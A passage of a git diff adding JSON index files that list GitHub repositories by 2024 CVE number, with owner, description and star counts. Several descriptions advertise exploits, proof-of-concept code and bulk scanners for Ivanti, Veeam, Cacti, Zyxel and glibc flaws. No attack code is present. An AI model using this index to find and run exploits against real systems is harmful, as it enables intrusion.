"https:\/\/github.com\/felipecruz91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felipecruz91\/node-ip-vex", + "description": "Sample project that uses VEX to supress CVE-2024-29415.", + "fork": false, + "created_at": "2024-07-05T07:50:29Z", + "updated_at": "2024-09-18T22:48:03Z", + "pushed_at": "2024-07-05T09:49:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29510.json b/2024/CVE-2024-29510.json new file mode 100644 index 0000000000..4c508e003f --- /dev/null +++ b/2024/CVE-2024-29510.json @@ -0,0 +1,33 @@ +[ + { + "id": 826318568, + "name": "CVE-2024-29510", + "full_name": "swsmith2391\/CVE-2024-29510", + "owner": { + "login": "swsmith2391", + "id": 50335205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50335205?v=4", + "html_url": "https:\/\/github.com\/swsmith2391", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swsmith2391\/CVE-2024-29510", + "description": "POC code for CVE-2024-29510 and demo VulnApp", + "fork": false, + "created_at": "2024-07-09T13:27:40Z", + "updated_at": "2024-07-10T17:37:31Z", + "pushed_at": "2024-07-10T17:34:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2961.json b/2024/CVE-2024-2961.json new file mode 100644 index 0000000000..25028ce345 --- /dev/null +++ b/2024/CVE-2024-2961.json @@ -0,0 +1,229 @@ +[ + { + "id": 791152279, + "name": "FIX-CVE-2024-2961", + "full_name": "mattaperkins\/FIX-CVE-2024-2961", + "owner": { + "login": "mattaperkins", + "id": 37165019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37165019?v=4", + "html_url": "https:\/\/github.com\/mattaperkins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mattaperkins\/FIX-CVE-2024-2961", + "description": "Quick mitigation script ", + "fork": false, + "created_at": "2024-04-24T07:32:08Z", + "updated_at": "2024-06-06T00:03:18Z", + "pushed_at": "2024-04-24T07:43:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803147840, + "name": "CVE-2024-2961", + "full_name": "rvizx\/CVE-2024-2961", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2024-2961", + "description": "CVE-2024–2961 Security Issue Mitigation Script", + "fork": false, + "created_at": "2024-05-20T06:53:23Z", + "updated_at": "2024-07-10T16:47:26Z", + "pushed_at": "2024-05-20T07:12:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806456046, + "name": "cnext-exploits", + "full_name": "ambionics\/cnext-exploits", + "owner": { + "login": "ambionics", + "id": 29630660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4", + "html_url": "https:\/\/github.com\/ambionics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambionics\/cnext-exploits", + "description": "Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()", + "fork": false, + "created_at": "2024-05-27T08:30:06Z", + "updated_at": "2024-11-27T02:13:25Z", + "pushed_at": "2024-09-30T08:45:56Z", + "stargazers_count": 421, + "watchers_count": 421, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 421, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 808153966, + "name": "iconvfix", + "full_name": "absolutedesignltd\/iconvfix", + "owner": { + "login": "absolutedesignltd", + "id": 11164000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11164000?v=4", + "html_url": "https:\/\/github.com\/absolutedesignltd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absolutedesignltd\/iconvfix", + "description": "Bash script to patch for CVE-2024-2961", + "fork": false, + "created_at": "2024-05-30T13:45:43Z", + "updated_at": "2024-05-30T13:57:37Z", + "pushed_at": "2024-05-30T13:57:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 810040956, + "name": "test_iconv", + "full_name": "exfil0\/test_iconv", + "owner": { + "login": "exfil0", + "id": 84948741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84948741?v=4", + "html_url": "https:\/\/github.com\/exfil0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exfil0\/test_iconv", + "description": "This repository contains a C program to test for CVE-2024-2961, a buffer overflow vulnerability in the iconv() function of glibc.", + "fork": false, + "created_at": "2024-06-03T23:53:43Z", + "updated_at": "2024-06-04T00:22:16Z", + "pushed_at": "2024-06-04T00:22:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer", + "cve", + "cve-202402961", + "glibc", + "iconv", + "overflow", + "pentest", + "test", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810186958, + "name": "cve-2024-2961", + "full_name": "tnishiox\/cve-2024-2961", + "owner": { + "login": "tnishiox", + "id": 163162093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4", + "html_url": "https:\/\/github.com\/tnishiox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tnishiox\/cve-2024-2961", + "description": null, + "fork": false, + "created_at": "2024-06-04T08:05:09Z", + "updated_at": "2024-06-04T09:01:19Z", + "pushed_at": "2024-06-04T09:01:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810234472, + "name": "CVE-2024-2961_poc", + "full_name": "kjdfklha\/CVE-2024-2961_poc", + "owner": { + "login": "kjdfklha", + "id": 106435455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106435455?v=4", + "html_url": "https:\/\/github.com\/kjdfklha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kjdfklha\/CVE-2024-2961_poc", + "description": null, + "fork": false, + "created_at": "2024-06-04T09:57:46Z", + "updated_at": "2024-09-20T09:16:54Z", + "pushed_at": "2024-06-04T10:02:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29671.json b/2024/CVE-2024-29671.json new file mode 100644 index 0000000000..ec15080bfd --- /dev/null +++ b/2024/CVE-2024-29671.json @@ -0,0 +1,33 @@ +[ + { + "id": 892033272, + "name": "CVE-2024-29671-POC", + "full_name": "laskdjlaskdj12\/CVE-2024-29671-POC", + "owner": { + "login": "laskdjlaskdj12", + "id": 16471540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16471540?v=4", + "html_url": "https:\/\/github.com\/laskdjlaskdj12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laskdjlaskdj12\/CVE-2024-29671-POC", + "description": "This is POC of CVE-2024-29671", + "fork": false, + "created_at": "2024-11-21T11:51:04Z", + "updated_at": "2024-11-22T18:00:19Z", + "pushed_at": "2024-11-22T18:00:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29824.json b/2024/CVE-2024-29824.json new file mode 100644 index 0000000000..72d7c2dd48 --- /dev/null +++ b/2024/CVE-2024-29824.json @@ -0,0 +1,64 @@ +[ + { + "id": 814183258, + "name": "CVE-2024-29824", + "full_name": "horizon3ai\/CVE-2024-29824", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-29824", + "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2024-06-12T13:53:32Z", + "updated_at": "2024-11-26T23:18:26Z", + "pushed_at": "2024-06-12T14:04:39Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 816713290, + "name": "CVE-2024-29824", + "full_name": "R4be1\/CVE-2024-29824", + "owner": { + "login": "R4be1", + "id": 110738599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110738599?v=4", + "html_url": "https:\/\/github.com\/R4be1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R4be1\/CVE-2024-29824", + "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability(Optimized version based on h3)", + "fork": false, + "created_at": "2024-06-18T09:07:23Z", + "updated_at": "2024-08-30T12:30:12Z", + "pushed_at": "2024-06-19T08:17:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29847.json b/2024/CVE-2024-29847.json new file mode 100644 index 0000000000..ccc69343ac --- /dev/null +++ b/2024/CVE-2024-29847.json @@ -0,0 +1,33 @@ +[ + { + "id": 857524820, + "name": "CVE-2024-29847", + "full_name": "sinsinology\/CVE-2024-29847", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29847", + "description": "Exploit for CVE-2024-29847", + "fork": false, + "created_at": "2024-09-14T21:51:41Z", + "updated_at": "2024-11-15T05:06:41Z", + "pushed_at": "2024-09-15T08:07:22Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29849.json b/2024/CVE-2024-29849.json new file mode 100644 index 0000000000..8e23dc643d --- /dev/null +++ b/2024/CVE-2024-29849.json @@ -0,0 +1,33 @@ +[ + { + "id": 812906778, + "name": "CVE-2024-29849", + "full_name": "sinsinology\/CVE-2024-29849", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29849", + "description": "Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)", + "fork": false, + "created_at": "2024-06-10T06:12:20Z", + "updated_at": "2024-11-21T05:22:48Z", + "pushed_at": "2024-06-13T08:40:57Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 86, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29855.json b/2024/CVE-2024-29855.json new file mode 100644 index 0000000000..e34868897f --- /dev/null +++ b/2024/CVE-2024-29855.json @@ -0,0 +1,33 @@ +[ + { + "id": 814554778, + "name": "CVE-2024-29855", + "full_name": "sinsinology\/CVE-2024-29855", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29855", + "description": "PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855", + "fork": false, + "created_at": "2024-06-13T08:32:55Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-17T10:45:06Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29863.json b/2024/CVE-2024-29863.json new file mode 100644 index 0000000000..b45d731dc6 --- /dev/null +++ b/2024/CVE-2024-29863.json @@ -0,0 +1,33 @@ +[ + { + "id": 832020588, + "name": "qlikview-poc-CVE-2024-29863", + "full_name": "pawlokk\/qlikview-poc-CVE-2024-29863", + "owner": { + "login": "pawlokk", + "id": 93943097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93943097?v=4", + "html_url": "https:\/\/github.com\/pawlokk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pawlokk\/qlikview-poc-CVE-2024-29863", + "description": "PoC for LPE with QlikView", + "fork": false, + "created_at": "2024-07-22T07:38:34Z", + "updated_at": "2024-07-22T07:40:44Z", + "pushed_at": "2024-07-22T07:40:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29868.json b/2024/CVE-2024-29868.json new file mode 100644 index 0000000000..9163e17af5 --- /dev/null +++ b/2024/CVE-2024-29868.json @@ -0,0 +1,33 @@ +[ + { + "id": 819463002, + "name": "CVE-2024-29868", + "full_name": "DEVisions\/CVE-2024-29868", + "owner": { + "login": "DEVisions", + "id": 88578649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88578649?v=4", + "html_url": "https:\/\/github.com\/DEVisions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DEVisions\/CVE-2024-29868", + "description": "Proof of concept of CVE-2024-29868 affecting Apache StreamPipes from 0.69.0 through 0.93.0", + "fork": false, + "created_at": "2024-06-24T14:53:05Z", + "updated_at": "2024-06-25T10:22:48Z", + "pushed_at": "2024-06-24T15:28:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29895.json b/2024/CVE-2024-29895.json new file mode 100644 index 0000000000..d090a3603b --- /dev/null +++ b/2024/CVE-2024-29895.json @@ -0,0 +1,135 @@ +[ + { + "id": 801030972, + "name": "CVE-2024-29895-CactiRCE-PoC", + "full_name": "Stuub\/CVE-2024-29895-CactiRCE-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-29895-CactiRCE-PoC", + "description": "CVE-2024-29895 PoC - Exploiting remote command execution in Cacti servers using the 1.3.X DEV branch builds", + "fork": false, + "created_at": "2024-05-15T13:11:45Z", + "updated_at": "2024-10-21T13:17:56Z", + "pushed_at": "2024-05-15T21:40:25Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cacti", + "cactirce", + "cve-2024", + "cve-2024-29895", + "owasp", + "php", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801392594, + "name": "CVE-2024-29895", + "full_name": "secunnix\/CVE-2024-29895", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-29895", + "description": "Cacti CVE-2024-29895 POC", + "fork": false, + "created_at": "2024-05-16T06:29:21Z", + "updated_at": "2024-05-16T19:17:05Z", + "pushed_at": "2024-05-16T15:29:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 801731520, + "name": "CVE-2024-29895.py", + "full_name": "ticofookfook\/CVE-2024-29895.py", + "owner": { + "login": "ticofookfook", + "id": 99700348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4", + "html_url": "https:\/\/github.com\/ticofookfook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2024-29895.py", + "description": null, + "fork": false, + "created_at": "2024-05-16T20:03:03Z", + "updated_at": "2024-05-16T20:05:37Z", + "pushed_at": "2024-05-16T20:05:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802277498, + "name": "CVE-2024-29895", + "full_name": "Rubioo02\/CVE-2024-29895", + "owner": { + "login": "Rubioo02", + "id": 153825296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4", + "html_url": "https:\/\/github.com\/Rubioo02", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2024-29895", + "description": "CVE-2024-29895 | RCE on CACTI 1.3.X dev", + "fork": false, + "created_at": "2024-05-17T22:03:29Z", + "updated_at": "2024-06-10T01:45:38Z", + "pushed_at": "2024-05-18T12:49:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29943.json b/2024/CVE-2024-29943.json new file mode 100644 index 0000000000..76d832ccd2 --- /dev/null +++ b/2024/CVE-2024-29943.json @@ -0,0 +1,33 @@ +[ + { + "id": 820945819, + "name": "CVE-2024-29943", + "full_name": "bjrjk\/CVE-2024-29943", + "owner": { + "login": "bjrjk", + "id": 6657270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6657270?v=4", + "html_url": "https:\/\/github.com\/bjrjk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bjrjk\/CVE-2024-29943", + "description": "A Pwn2Own 2024 SpiderMonkey JIT Bug: From Integer Range Inconsistency to Bound Check Elimination then RCE", + "fork": false, + "created_at": "2024-06-27T13:47:52Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-07-07T03:36:49Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 88, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2997.json b/2024/CVE-2024-2997.json new file mode 100644 index 0000000000..e032e0e73b --- /dev/null +++ b/2024/CVE-2024-2997.json @@ -0,0 +1,33 @@ +[ + { + "id": 837629767, + "name": "CVE-2024-2997", + "full_name": "lfillaz\/CVE-2024-2997", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-2997", + "description": "The tool helps in quickly identifying vulnerabilities by examining a comprehensive list of potential paths on a website, making it useful for security assessments.", + "fork": false, + "created_at": "2024-08-03T14:40:08Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-09-24T00:27:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29972.json b/2024/CVE-2024-29972.json new file mode 100644 index 0000000000..70232ba380 --- /dev/null +++ b/2024/CVE-2024-29972.json @@ -0,0 +1,64 @@ +[ + { + "id": 817750758, + "name": "CVE-2024-29972", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-29972", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-29972", + "description": null, + "fork": false, + "created_at": "2024-06-20T11:12:52Z", + "updated_at": "2024-08-05T12:05:43Z", + "pushed_at": "2024-06-20T11:21:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822251439, + "name": "CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "full_name": "Pommaq\/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "owner": { + "login": "Pommaq", + "id": 42520348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42520348?v=4", + "html_url": "https:\/\/github.com\/Pommaq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pommaq\/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "description": "This is a proof of concept for the Zyxel vulnerabilities I found. Read the blog :)", + "fork": false, + "created_at": "2024-06-30T17:54:02Z", + "updated_at": "2024-08-20T10:47:07Z", + "pushed_at": "2024-06-30T17:54:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29973.json b/2024/CVE-2024-29973.json new file mode 100644 index 0000000000..547e95acd0 --- /dev/null +++ b/2024/CVE-2024-29973.json @@ -0,0 +1,188 @@ +[ + { + "id": 817231068, + "name": "CVE-2024-29973", + "full_name": "momika233\/CVE-2024-29973", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-06-19T09:28:46Z", + "updated_at": "2024-06-20T04:21:51Z", + "pushed_at": "2024-06-19T09:29:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817257622, + "name": "CVE-2024-29973", + "full_name": "bigb0x\/CVE-2024-29973", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-29973", + "description": "POC for CVE-2024-29973", + "fork": false, + "created_at": "2024-06-19T10:34:56Z", + "updated_at": "2024-09-23T06:25:00Z", + "pushed_at": "2024-07-06T00:17:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817562128, + "name": "CVE-2024-29973", + "full_name": "k3lpi3b4nsh33\/CVE-2024-29973", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-06-20T01:52:35Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-20T02:27:44Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818123344, + "name": "CVE-2024-29973", + "full_name": "p0et08\/CVE-2024-29973", + "owner": { + "login": "p0et08", + "id": 173439951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173439951?v=4", + "html_url": "https:\/\/github.com\/p0et08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0et08\/CVE-2024-29973", + "description": "PoC and Bulk Scanner for CVE-2024-29973", + "fork": false, + "created_at": "2024-06-21T06:38:50Z", + "updated_at": "2024-06-21T07:00:51Z", + "pushed_at": "2024-06-21T07:00:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818318428, + "name": "CVE-2024-29973", + "full_name": "RevoltSecurities\/CVE-2024-29973", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-29973", + "description": "Exploiter a Vulnerability detection and Exploitation tool for CVE-2024-29973 with Asychronous Performance.", + "fork": false, + "created_at": "2024-06-21T15:20:52Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-21T15:33:09Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870929719, + "name": "CVE-2024-29973", + "full_name": "skyrowalker\/CVE-2024-29973", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-10-10T23:48:55Z", + "updated_at": "2024-10-11T20:10:47Z", + "pushed_at": "2024-10-11T20:10:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 